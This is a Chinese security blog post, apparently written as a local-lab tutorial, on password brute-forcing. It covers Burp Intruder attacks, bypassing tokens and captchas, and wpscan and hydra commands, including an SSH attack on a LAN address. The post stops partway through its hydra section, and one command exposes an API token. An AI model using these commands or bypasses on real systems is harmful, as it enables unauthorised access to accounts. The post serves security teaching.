<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.jpg">
  <link rel="mask-icon" href="/images/logo.jpg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"squar3c.github.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":"mac"},"fold":{"enable":true,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文出现域名均为搭建的本地靶场域名  1 概述​	穷举就是枚举的意思，在互联网的今天，需要使用某种的服务，大多数都需要口令登录，这个口令就是密码，密码的强度分为，弱口令、中度口令、强度口令。如果登录的服务为弱口令，那会存在很大的安全隐患，黑客通过穷举弱口令对服务进行攻击，很容易就得到登录密码。得到密码之后就能登录服务，进行其他危害较大得操作。黑客也能通过对用户得信息整理，组合密码进行穷举攻击。例">
<meta property="og:type" content="article">
<meta property="og:title" content="穷举">
<meta property="og:url" content="https://squar3c.github.com/posts/e93fc31a/index.html">
<meta property="og:site_name" content="squar3cの秘密小屋">
<meta property="og:description" content="本文出现域名均为搭建的本地靶场域名  1 概述​	穷举就是枚举的意思，在互联网的今天，需要使用某种的服务，大多数都需要口令登录，这个口令就是密码，密码的强度分为，弱口令、中度口令、强度口令。如果登录的服务为弱口令，那会存在很大的安全隐患，黑客通过穷举弱口令对服务进行攻击，很容易就得到登录密码。得到密码之后就能登录服务，进行其他危害较大得操作。黑客也能通过对用户得信息整理，组合密码进行穷举攻击。例">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312225424438.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312225451754.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312225540034.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312225644180.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312230827144.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312231604753.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312231626743.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312231721421.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312231837586.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312232023480.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312232151766.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312232336232.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312233222030.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312234452887.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312234548755.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312234722354.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312234834804.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312235311801.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312235427207.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250313000046133.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250313000648523.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250313001039560.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250313001105420.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317212314918.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317215045138.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317215215191.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317232800500.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317233427264.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317233635882.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317234038917.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317234329708.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317235246581.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317235614010.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250317235842515.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250318000514529.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250318001134113.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250319215222421.png">
<meta property="og:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250319220322180.png">
<meta property="article:published_time" content="2025-03-12T13:35:26.000Z">
<meta property="article:modified_time" content="2025-03-19T14:27:13.743Z">
<meta property="article:author" content="squar3c">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://squar3c.github.com/posts/e93fc31a/image-20250312225424438.png">


<link rel="canonical" href="https://squar3c.github.com/posts/e93fc31a/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://squar3c.github.com/posts/e93fc31a/","path":"posts/e93fc31a/","title":"穷举"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>穷举 | squar3cの秘密小屋</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>

<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/logo.jpg" alt="squar3cの秘密小屋">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">squar3cの秘密小屋</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">爱我所爱</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%A6%82%E8%BF%B0"><span class="nav-number">1.</span> <span class="nav-text">1 概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-burpsuite%E7%A9%B7%E4%B8%BE%E5%90%8E%E5%8F%B0%E5%AF%86%E7%A0%81"><span class="nav-number">2.</span> <span class="nav-text">2 burpsuite穷举后台密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E5%B8%A6%E6%9C%89Token%E9%98%B2%E5%BE%A1%E7%9A%84%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4"><span class="nav-number">3.</span> <span class="nav-text">3 带有Token防御的穷举爆破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-%E9%92%88%E5%AF%B9%E6%9C%89%E9%AA%8C%E8%AF%81%E7%A0%81%E7%9A%84%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4"><span class="nav-number">4.</span> <span class="nav-text">4 针对有验证码的穷举爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-Cookie%E4%B8%8D%E5%AD%98%E5%9C%A8%E4%B8%8D%E9%AA%8C%E8%AF%81%E7%BB%95%E8%BF%87"><span class="nav-number">4.1.</span> <span class="nav-text">4.1 Cookie不存在不验证绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-2-%E5%90%8E%E5%8F%B0%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%8D%E9%94%80%E6%AF%81%E7%BB%95%E8%BF%87"><span class="nav-number">4.2.</span> <span class="nav-text">4.2 后台验证码不销毁绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-3-%E9%AA%8C%E8%AF%81%E7%A0%81%E8%AF%86%E5%88%AB%E7%88%86%E7%A0%B4"><span class="nav-number">4.3.</span> <span class="nav-text">4.3 验证码识别爆破</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-%E4%B8%80%E4%BA%9B%E5%B8%B8%E8%A7%81%E8%BD%AF%E4%BB%B6%E7%99%BB%E5%BD%95%E7%A9%B7%E4%B8%BE"><span class="nav-number">5.</span> <span class="nav-text">5 一些常见软件登录穷举</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-phpmyadmin"><span class="nav-number">5.1.</span> <span class="nav-text">5.1 phpmyadmin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-2-WordPress"><span class="nav-number">5.2.</span> <span class="nav-text">5.2 WordPress</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-hydra%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8"><span class="nav-number">6.</span> <span class="nav-text">6 hydra工具使用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#6-1-ssh"><span class="nav-number">6.1.</span> <span class="nav-text">6.1 ssh</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-2-ftp"><span class="nav-number">6.2.</span> <span class="nav-text">6.2 ftp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-3-mysql"><span class="nav-number">6.3.</span> <span class="nav-text">6.3 mysql</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-4-smb"><span class="nav-number">6.4.</span> <span class="nav-text">6.4 smb</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-5-rdp"><span class="nav-number">6.5.</span> <span class="nav-text">6.5 rdp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-6-http"><span class="nav-number">6.6.</span> <span class="nav-text">6.6 http</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-7-mssql"><span class="nav-number">6.7.</span> <span class="nav-text">6.7 mssql</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-8-redis"><span class="nav-number">6.8.</span> <span class="nav-text">6.8 redis</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-metasploite%E7%A9%B7%E4%B8%BE%E6%A8%A1%E5%9D%97"><span class="nav-number">7.</span> <span class="nav-text">7 metasploite穷举模块</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#7-1-mssql%E7%88%86%E7%A0%B4"><span class="nav-number">7.1.</span> <span class="nav-text">7.1 mssql爆破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-2-%E9%82%AE%E7%AE%B1%E7%88%86%E7%A0%B4"><span class="nav-number">7.2.</span> <span class="nav-text">7.2 邮箱爆破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-3-Tomcat%E7%88%86%E7%A0%B4"><span class="nav-number">7.3.</span> <span class="nav-text">7.3 Tomcat爆破</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="squar3c"
      src="/images/logo.jpg">
  <p class="site-author-name" itemprop="name">squar3c</p>
  <div class="site-description" itemprop="description">爱就在眼前</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          链接
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://ma3t1n.github.io/" title="https:&#x2F;&#x2F;ma3t1n.github.io&#x2F;" rel="noopener" target="_blank">Ma3t1n</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://squar3c.github.com/posts/e93fc31a/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/logo.jpg">
      <meta itemprop="name" content="squar3c">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="squar3cの秘密小屋">
      <meta itemprop="description" content="爱就在眼前">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="穷举 | squar3cの秘密小屋">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          穷举
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-03-12 21:35:26" itemprop="dateCreated datePublished" datetime="2025-03-12T21:35:26+08:00">2025-03-12</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-03-19 22:27:13" itemprop="dateModified" datetime="2025-03-19T22:27:13+08:00">2025-03-19</time>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>9 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><blockquote>
<p>本文出现域名均为搭建的本地靶场域名</p>
</blockquote>
<h2 id="1-概述"><a href="#1-概述" class="headerlink" title="1 概述"></a>1 概述</h2><p>​	穷举就是枚举的意思，在互联网的今天，需要使用某种的服务，大多数都需要口令登录，这个口令就是密码，密码的强度分为，弱口令、中度口令、强度口令。如果登录的服务为弱口令，那会存在很大的安全隐患，黑客通过穷举弱口令对服务进行攻击，很容易就得到登录密码。得到密码之后就能登录服务，进行其他危害较大得操作。黑客也能通过对用户得信息整理，组合密码进行穷举攻击。例如根据用户的生日号码，出身年月日和姓名进行口令组合，再对其服务进行穷举。</p>
<p><strong>常见服务</strong></p>
<table>
<thead>
<tr>
<th>服务</th>
<th>端口</th>
</tr>
</thead>
<tbody><tr>
<td>web</td>
<td>80</td>
</tr>
<tr>
<td>mysql</td>
<td>3306</td>
</tr>
<tr>
<td>Microsoft SQL Server</td>
<td>1433</td>
</tr>
<tr>
<td>https</td>
<td>443</td>
</tr>
<tr>
<td>ftp</td>
<td>21</td>
</tr>
<tr>
<td>ssh</td>
<td>22</td>
</tr>
<tr>
<td>dns</td>
<td>53</td>
</tr>
<tr>
<td>tomcat</td>
<td>8080</td>
</tr>
<tr>
<td>redis</td>
<td>6379</td>
</tr>
<tr>
<td>rsync</td>
<td>873</td>
</tr>
<tr>
<td>PostgreSQL</td>
<td>5432</td>
</tr>
<tr>
<td>cobaltstrike teamserver</td>
<td>50050</td>
</tr>
<tr>
<td>smtp</td>
<td>25</td>
</tr>
<tr>
<td>pop3</td>
<td>110</td>
</tr>
<tr>
<td>远程终端rdp</td>
<td>3389</td>
</tr>
<tr>
<td>smb</td>
<td>445</td>
</tr>
<tr>
<td>rpc</td>
<td>135</td>
</tr>
<tr>
<td>imap</td>
<td>143</td>
</tr>
<tr>
<td>NetBIOS</td>
<td>139</td>
</tr>
<tr>
<td>SMTPS</td>
<td>465</td>
</tr>
<tr>
<td>POP3S</td>
<td>995</td>
</tr>
<tr>
<td>mogodb</td>
<td>27018</td>
</tr>
<tr>
<td>memcached</td>
<td>11211</td>
</tr>
<tr>
<td>telnet</td>
<td>23</td>
</tr>
<tr>
<td>oracle</td>
<td>1521</td>
</tr>
</tbody></table>
<h2 id="2-burpsuite穷举后台密码"><a href="#2-burpsuite穷举后台密码" class="headerlink" title="2 burpsuite穷举后台密码"></a>2 burpsuite穷举后台密码</h2><p>抓包，然后放到Intruder模块，添加payload位置</p>
<img src="/posts/e93fc31a/image-20250312225424438.png" class="" title="image-20250312225424438">

<p>加载payloads</p>
<img src="/posts/e93fc31a/image-20250312225451754.png" class="" title="image-20250312225451754">

<p>开始攻击，爆破出密码</p>
<img src="/posts/e93fc31a/image-20250312225540034.png" class="" title="image-20250312225540034">

<p>成功登录后台</p>
<img src="/posts/e93fc31a/image-20250312225644180.png" class="" title="image-20250312225644180">



<h2 id="3-带有Token防御的穷举爆破"><a href="#3-带有Token防御的穷举爆破" class="headerlink" title="3 带有Token防御的穷举爆破"></a>3 带有Token防御的穷举爆破</h2><p>有的网站存在一次性Token，再用过一次后就失效了，导致没办法爆破</p>
<img src="/posts/e93fc31a/image-20250312230827144.png" class="" title="image-20250312230827144">

<p>这里可以使用burpsuite的宏设置，打开<code>Settings</code>中的<code>Session</code>。</p>
<img src="/posts/e93fc31a/image-20250312231604753.png" class="" title="image-20250312231604753">

<p>添加规则，选择运行宏。</p>
<img src="/posts/e93fc31a/image-20250312231626743.png" class="" title="image-20250312231626743">

<p>选择添加宏</p>
<img src="/posts/e93fc31a/image-20250312231721421.png" class="" title="image-20250312231721421">

<p>这里选择包含Token的响应</p>
<img src="/posts/e93fc31a/image-20250312231837586.png" class="" title="image-20250312231837586">

<p>选择项目设置，在自定义参数位置添加，选择要获取的参数，这里要注意<strong>参数名一定要一致</strong></p>
<img src="/posts/e93fc31a/image-20250312232023480.png" class="" title="image-20250312232023480">

<p>一通确认，将更改参数名设置一下</p>
<img src="/posts/e93fc31a/image-20250312232151766.png" class="" title="image-20250312232151766">

<p>可以更改一下作用范围</p>
<img src="/posts/e93fc31a/image-20250312232336232.png" class="" title="image-20250312232336232">

<p>然后就可以开始爆破了，不过还是会有一些几率替换失败，感觉是爆破线程过高的原因，调低线程以后爆破成功了。</p>
<img src="/posts/e93fc31a/image-20250312233222030.png" class="" title="image-20250312233222030">


<h2 id="4-针对有验证码的穷举爆破"><a href="#4-针对有验证码的穷举爆破" class="headerlink" title="4 针对有验证码的穷举爆破"></a>4 针对有验证码的穷举爆破</h2><h3 id="4-1-Cookie不存在不验证绕过"><a href="#4-1-Cookie不存在不验证绕过" class="headerlink" title="4.1 Cookie不存在不验证绕过"></a>4.1 Cookie不存在不验证绕过</h3><p>在请求包Cookie中存在字段<code>PHPSESSID</code></p>
<img src="/posts/e93fc31a/image-20250312234452887.png" class="" title="image-20250312234452887">

<p>其值其实对应于一个文件</p>
<img src="/posts/e93fc31a/image-20250312234548755.png" class="" title="image-20250312234548755">

<p>这里如果对其没有验证，则可以删除<code>PHPSESSID</code>实现绕过，爆破成功</p>
<img src="/posts/e93fc31a/image-20250312234722354.png" class="" title="image-20250312234722354">

<img src="/posts/e93fc31a/image-20250312234834804.png" class="" title="image-20250312234834804">

<h3 id="4-2-后台验证码不销毁绕过"><a href="#4-2-后台验证码不销毁绕过" class="headerlink" title="4.2 后台验证码不销毁绕过"></a>4.2 后台验证码不销毁绕过</h3><p>有的网站验证码在使用后不会销毁，可以复用，达到绕过</p>
<img src="/posts/e93fc31a/image-20250312235311801.png" class="" title="image-20250312235311801">

<img src="/posts/e93fc31a/image-20250312235427207.png" class="" title="image-20250312235427207">

<h3 id="4-3-验证码识别爆破"><a href="#4-3-验证码识别爆破" class="headerlink" title="4.3 验证码识别爆破"></a>4.3 验证码识别爆破</h3><p>使用验证码识别工具，直接识别出验证码值，进行爆破</p>
<img src="/posts/e93fc31a/image-20250313000046133.png" class="" title="image-20250313000046133">

<p>这里正常抓包，添加爆破位置，添加验证码路径，载入字典即可，在载入字典时需修改<code>Line Endings</code>为<code>Windows</code>，不然字典导不进去</p>
<img src="/posts/e93fc31a/image-20250313000648523.png" class="" title="image-20250313000648523">

<img src="/posts/e93fc31a/image-20250313001039560.png" class="" title="image-20250313001039560">

<p>填写验证码错误信息，即可开始爆破</p>
<img src="/posts/e93fc31a/image-20250313001105420.png" class="" title="image-20250313001105420">



<h2 id="5-一些常见软件登录穷举"><a href="#5-一些常见软件登录穷举" class="headerlink" title="5 一些常见软件登录穷举"></a>5 一些常见软件登录穷举</h2><h3 id="5-1-phpmyadmin"><a href="#5-1-phpmyadmin" class="headerlink" title="5.1 phpmyadmin"></a>5.1 phpmyadmin</h3><p>通常爆破<code>admin</code>，<code>root</code>，<code>test</code>用户密码</p>
<img src="/posts/e93fc31a/image-20250317212314918.png" class="" title="image-20250317212314918">

<p><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-159062.htm">下载地址</a></p>
<h3 id="5-2-WordPress"><a href="#5-2-WordPress" class="headerlink" title="5.2 WordPress"></a>5.2 WordPress</h3><p>可以拼接路径，查看账户信息<code>/wp-json/wp/v2/users</code></p>
<img src="/posts/e93fc31a/image-20250317215045138.png" class="" title="image-20250317215045138">

<p>使用<code>WPScan</code>工具，首先在<a target="_blank" rel="noopener" href="https://wpscan.com/">WPScan</a>注册账户获取<code>token</code>，使用以下命令</p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ wpscan --url http://xxx.com -e u -P ./top1000.txt --api-token 6qGDsJorRIvSazNIg9s4mwjxX8nOUPRL3to6fdJgwoo</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317215215191.png" class="" title="image-20250317215215191">

<h2 id="6-hydra工具使用"><a href="#6-hydra工具使用" class="headerlink" title="6 hydra工具使用"></a>6 hydra工具使用</h2><figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">-l login 小写，指定用户名进行破解</span><br><span class="line">-L file 大写，指定用户的用户名字典</span><br><span class="line">-p pass 小写，用于指定密码破解，很少使用，一般采用密码字典。</span><br><span class="line">-P file 大写，用于指定密码字典。</span><br><span class="line">-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探</span><br><span class="line">-M file 指定目标ip列表文件，批量破解。</span><br><span class="line">-o file 指定结果输出文件</span><br><span class="line">-f 找到第一对登录名或者密码的时候中止破解。</span><br><span class="line">-t tasks 同时运行的线程数，默认是16</span><br><span class="line">-w <span class="keyword">time</span> 设置最大超时时间，单位</span><br><span class="line">-v / -V 显示详细过程</span><br><span class="line">-R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。）</span><br><span class="line">-x 自定义密码</span><br></pre></td></tr></tbody></table></figure>



<h3 id="6-1-ssh"><a href="#6-1-ssh" class="headerlink" title="6.1 ssh"></a>6.1 ssh</h3><p><strong>配置Ubuntu root用户ssh登录</strong></p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> apt install openssh-server <span class="comment"># 安装ssh</span></span><br><span class="line">$ <span class="built_in">sudo</span> nano /etc/ssh/sshd_config</span><br><span class="line"><span class="comment"># PermitRootLogin prohibit-password ——&gt; PermitRootLogin yes</span></span><br><span class="line">$ <span class="built_in">sudo</span> service ssh restart <span class="comment"># 重启ssh服务</span></span><br></pre></td></tr></tbody></table></figure>

<p>使用<code>hydra</code>对ssh密码进行爆破</p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hydra -l root -P ./top500.txt -e ns -vV -t 1 -f 192.168.31.50 ssh</span><br></pre></td></tr></tbody></table></figure>

<img src="/posts/e93fc31a/image-20250317232800500.png" class="" title="image-20250317232800500">

